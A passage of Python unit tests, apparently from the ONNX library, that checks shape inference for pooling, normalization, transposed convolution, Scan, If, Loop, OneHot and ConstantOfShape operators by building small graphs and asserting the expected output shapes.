[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_maxpool_with_indices(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y", "Z"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3)),
make_tensor_value_info("Z", TensorProto.INT64, (5, 3, 3, 3))])
def test_maxpool_3D(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3, 3))])
def test_maxpool_with_padding(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 6, 6))])
def test_maxpool_with_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_maxpool_with_floor_mode(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (32, 288, 35, 35))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], strides=[2, 2], ceil_mode=False)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (32, 288, 17, 17))])
def test_maxpool_with_ceil_mode(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (32, 288, 35, 35))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], strides=[2, 2], ceil_mode=True)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (32, 288, 18, 18))])
def test_maxpool_ceil(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (1, 1, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[3, 3], strides=[2, 2], ceil_mode=True)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (1, 1, 2, 2))])
def test_maxpool_with_dilations(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], dilations=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 2, 2))])
def test_maxpool_with_same_upper_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_UPPER", kernel_shape=[2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 2, 2))])
def test_maxpool_with_same_upper_padding_and_stride_and_dilation(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_UPPER", kernel_shape=[2, 2], strides=[2, 2], dilations=[2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 2, 2))])
def test_maxpool_with_same_upper_padding_and_stride_one(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_UPPER", kernel_shape=[2, 2], strides=[1, 1])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 4, 4))])
def test_maxpool_with_same_lower_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 9, 9))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_LOWER", kernel_shape=[2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 5, 5))])
def test_maxpool_with_same_lower_padding_and_stride_and_dilation(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 9, 9))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_LOWER", kernel_shape=[2, 2], strides=[2, 2], dilations=[2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 5, 5))])
def test_maxpool_with_same_lower_padding_and_big_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_LOWER", kernel_shape=[2, 2], strides=[4, 4])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_averagepool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_averagepool_3D(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3, 3))])
def test_averagepool_with_padding(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 6, 6))])
def test_averagepool_with_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_averagepool_ceil(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (1, 1, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[3, 3], strides=[2, 2], ceil_mode=True)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (1, 1, 2, 2))])
def test_lppool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_lppool_3D(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3, 3))])
def test_lppool_with_padding(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 6, 6))])
def test_lppool_with_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_roipool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4)),
("rois", TensorProto.INT64, (2, 5))],
[make_node("MaxRoiPool", ["X", "rois"], ["Y"], pooled_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (2, 3, 2, 2))])
def test_lp_norm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7))],
[make_node('LpNormalization', ['x'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])
def test_instance_norm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,))],
[make_node('InstanceNormalization', ['x', 'scale', 'b'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])
def test_global_maxpool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("GlobalMaxPool", ["X"], ["Y"])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_global_averagepool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("GlobalAveragePool", ["X"], ["Y"])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_global_lppool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("GlobalLpPool", ["X"], ["Y"])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_conv_transpose(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 33, 33))])
def test_conv_transpose_with_pads(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 30, 30))])
def test_conv_transpose_with_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], output_shape=[36, 36])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 36, 36))])
def test_conv_transpose_with_kernel_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, None, None))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', kernel_shape=[3, 3], strides=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 30, 30))])
def test_conv_transpose_with_dilations(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], dilations=[3, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 34, 34))])
def test_conv_transpose_with_group(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], group=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 64, 30, 30))])
def test_conv_transpose_with_group_and_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], group=2, output_shape=[36, 36])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 64, 36, 36))])
def test_conv_transpose_with_pads_and_auto_pads(self): # type: () -> None
# This test should fail because pads cannot be used simultaneously with auto_pad
graph = self._make_graph(
[('X', TensorProto.FLOAT, (1, 1, 2, 2)),
('W', TensorProto.FLOAT, (1, 1, 3, 3)),
('B', TensorProto.FLOAT, (1, ))],
[make_node('ConvTranspose', ['X', 'W', 'B'], 'Y', auto_pad="SAME_UPPER", strides=[1, 1], pads=[0, 1, 1, 0])],
[])
self.assertRaises(onnx.shape_inference.InferenceError, onnx.shape_inference.infer_shapes, helper.make_model(graph), strict_mode=True)
def test_conv_transpose_auto_pads(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', auto_pad="SAME_UPPER", strides=[2, 2])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 32, 32))])
def test_mvn_function_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16))],
[make_node('MeanVarianceNormalization', 'X', 'Y', axes=[0, 2, 3])],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 48, 16, 16))])
def test_scan(self): # type: () -> None
batch_size = 1
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
# can't use self._make_graph for the subgraph as it add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the number of inputs passed from Scan to match
# the GraphProto, but Scan knows nothing about the additional inputs.
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (batch_size, loop_state_size)),
('scan_input', TensorProto.FLOAT, (batch_size, seq_len, input_size))],
[make_node('Scan', ['', 'loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (batch_size, loop_state_size)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (batch_size, seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 8)])
def test_scan_opset9(self): # type: () -> None
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
# can't use self._make_graph for the subgraph as it add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the number of inputs passed from Scan to match
# the GraphProto, but Scan knows nothing about the additional inputs.
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_scan_opset9_axes(self): # type: () -> None
axis_0_len = 'axis0'
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
# can't use self._make_graph for the subgraph as it add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the number of inputs passed from Scan to match
# the GraphProto, but Scan knows nothing about the additional inputs.
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph, scan_input_axes=[1])],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (seq_len, axis_0_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_scan_opset9_output_axes(self): # type: () -> None
axis_0_len = 'axis0'
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph, scan_input_axes=[1], scan_output_axes=[1])],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_scan_opset9_negative_axes(self): # type: () -> None
axis_0_len = 'axis0'
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph, scan_input_axes=[-2], scan_output_axes=[-2])],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_if_ver1(self): # type: () -> None
# Create a simple If node where the 'then' subgraph adds to the current value, and the 'else' subgraph
# subtracts.
# can't use self._make_graph for the subgraphs as that add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the subgraphs to have zero inputs
then_subgraph = helper.make_graph(
[make_node('Add', ['current_value', 'add_value'], ['then_output'])],
"then_subgraph",
[], # no inputs
[make_tensor_value_info('then_output', TensorProto.UNDEFINED, None)],
)
else_subgraph = helper.make_graph(
[make_node('Sub', ['current_value', 'sub_value'], ['else_output'])],
"else_subgraph",
[], # no inputs
[make_tensor_value_info('else_output', TensorProto.UNDEFINED, None)],
)
graph = self._make_graph(
[('cond', TensorProto.BOOL, (1,)),
('current_value', TensorProto.FLOAT, (1,)),
('add_value', TensorProto.FLOAT, (1,)),
('sub_value', TensorProto.FLOAT, (1,))],
[make_node('If', ['cond'], ['if_output'],
then_branch=then_subgraph, else_branch=else_subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('if_output', TensorProto.FLOAT, (1,))],
opset_imports=[make_opsetid(ONNX_DOMAIN, 10)])
def test_if(self): # type: () -> None
# Create a simple If node where the 'then' subgraph adds to the current value, and the 'else' subgraph
# subtracts.
# can't use self._make_graph for the subgraphs as that add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the subgraphs to have zero inputs
then_subgraph = helper.make_graph(
[make_node('Add', ['current_value', 'add_value'], ['then_output'])],
"then_subgraph",
[], # no inputs
[make_tensor_value_info('then_output', TensorProto.UNDEFINED, None)],
)
else_subgraph = helper.make_graph(
[make_node('Sub', ['current_value', 'sub_value'], ['else_output'])],
"else_subgraph",
[], # no inputs
[make_tensor_value_info('else_output', TensorProto.UNDEFINED, None)],
)
graph = self._make_graph(
[('cond', TensorProto.BOOL, (1,)),
('current_value', TensorProto.FLOAT, (1,)),
('add_value', TensorProto.FLOAT, (1,)),
('sub_value', TensorProto.FLOAT, (1,))],
[make_node('If', ['cond'], ['if_output'],
then_branch=then_subgraph, else_branch=else_subgraph)],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('if_output', TensorProto.FLOAT, (1,))])
def test_if_with_different_shapes_in_then_else_branches(self): # type: () -> None
# Create a simple If node where the 'then' subgraph adds to the current value, and the 'else' subgraph
# subtracts.
# can't use self._make_graph for the subgraphs as that add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the subgraphs to have zero inputs
then_subgraph = helper.make_graph(
[make_node('Add', ['current_value', 'add_value'], ['then_output'])],
"then_subgraph",
[], # no inputs
[make_tensor_value_info('then_output', TensorProto.UNDEFINED, (1,))],
)
else_subgraph = helper.make_graph(
[make_node('Sub', ['current_value', 'sub_value'], ['else_output'])],
"else_subgraph",
[], # no inputs
[make_tensor_value_info('else_output', TensorProto.UNDEFINED, (5,))],
)
graph = self._make_graph(
[('cond', TensorProto.BOOL, (1,)),
('current_value', TensorProto.FLOAT, (1,)),
('add_value', TensorProto.FLOAT, (1,)),
('sub_value', TensorProto.FLOAT, (5,))],
[make_node('If', ['cond'], ['if_output'],
then_branch=then_subgraph, else_branch=else_subgraph)],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('if_output', TensorProto.FLOAT, (None,))]) # type: ignore
def test_maxunpool_shape_without_output_shape(self): # type: () -> None
graph = self._make_graph(
[('xT', TensorProto.FLOAT, (1, 1, 2, 2)),
('xI', TensorProto.FLOAT, (1, 1, 2, 2))],
[make_node('MaxUnpool', ['xT', 'xI'], 'Y', kernel_shape=[2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (1, 1, 4, 4))])
def test_maxunpool_shape_with_output_shape(self): # type: () -> None
graph = self._make_graph(
[('xT', TensorProto.FLOAT, (1, 1, 2, 2)),
('xI', TensorProto.FLOAT, (1, 1, 2, 2)),
('output_shape', TensorProto.FLOAT, (4, ))],
[make_node('MaxUnpool', ['xT', 'xI', 'output_shape'], 'Y', kernel_shape=[2, 2], strides=[2, 2])],
[make_tensor_value_info("Y", TensorProto.FLOAT, None)])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, None)])
def test_onehot_without_axis(self): # type: () -> None
graph = self._make_graph(
[('indices', TensorProto.INT64, (2, 2)),
('depth', TensorProto.INT64, ()),
('values', TensorProto.FLOAT, (2, ))],
[make_node('OneHot', ['indices', 'depth', 'values'], 'Y')],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (2, 2, None))]) # type: ignore
def test_onehot_with_axis(self): # type: () -> None
graph = self._make_graph(
[('indices', TensorProto.INT64, (2, 3, 5)),
('depth', TensorProto.INT64, (1, )),
('values', TensorProto.FLOAT, (2, ))],
[make_node('OneHot', ['indices', 'depth', 'values'], 'Y', axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (2, None, 3, 5))]) # type: ignore
def test_loop(self): # type: () -> None
# can't use self._make_graph for the subgraph as it add more inputs for the Reshape operations it inserts.
# this breaks the subgraph inferencing as it expects the number of inputs passed from Loop to match
# the GraphProto, but Loop knows nothing about the additional inputs.
input_value_infos = [make_tensor_value_info('iter_num_in', TensorProto.INT64, (1,)),
make_tensor_value_info('cond_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, ())]
output_value_infos = [make_tensor_value_info('cond_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.FLOAT, (3,))]
subgraph = helper.make_graph(
[make_node('Identity', ['cond_in'], ['cond_out']),
make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['outer_scope_input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('max_trip_count', TensorProto.INT64, (1,)),
('cond_orig', TensorProto.FLOAT, (1,)),
('loop_state_orig', TensorProto.FLOAT, (2,)),
('outer_scope_input', TensorProto.FLOAT, (3,))],
[make_node('Loop', ['max_trip_count', 'cond_orig', 'loop_state_orig'], ['loop_state_final', 'loop_output'],
body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, None), # shape may change between iterations
make_tensor_value_info('loop_output', TensorProto.FLOAT, (None, 3))]) # type: ignore
def test_loop_no_state(self): # type: () -> None
input_value_infos = [make_tensor_value_info('iter_num_in', TensorProto.INT64, (1,)),
make_tensor_value_info('cond_in', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('cond_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.FLOAT, (3,))]
subgraph = helper.make_graph(
[make_node('Identity', ['cond_in'], ['cond_out']),
make_node('Identity', ['outer_scope_input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('max_trip_count', TensorProto.INT64, (1,)),
('cond_orig', TensorProto.FLOAT, (1,)),
('outer_scope_input', TensorProto.FLOAT, (3,))],
[make_node('Loop', ['max_trip_count', 'cond_orig'], ['loop_output'],
body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_output', TensorProto.FLOAT, (None, 3))]) # type: ignore
def test_constantofshape_with_input_shape(self): # type: () -> None
graph = self._make_graph([],
[make_node("Constant", [], ['shape'],
value=make_tensor('shape', TensorProto.INT64, (3,), (3, 4, 5))),
make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.INT32, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('shape', TensorProto.INT64, (3,)),
make_tensor_value_info('y', TensorProto.INT32, (3, 4, 5))]) # type: ignore
def test_constantofshape_without_input_shape(self): # type: () -> None
graph = self._make_graph([('shape', TensorProto.INT64, (3, ))],
[make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.UINT8, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.UINT8, (None, None, None))]) # type: ignore
def test_constantofshape_without_input_shape_scalar(self): # type: () -> None
graph = self._make_graph([('shape', TensorProto.INT64, (0, ))],
[make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.UINT8, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.UINT8, ())]) # type: ignore
def test_constantofshape_with_shape_zero(self): # type: () -> None
graph = self._make_graph([],
[make_node("Constant", [], ['shape'],
value=make_tensor('shape', TensorProto.INT64, (1,), (0,))),
make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.INT32, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('shape', TensorProto.INT64, (1,)),
make_tensor_value_info('y', TensorProto.INT32, (0,))]) # type: ignore
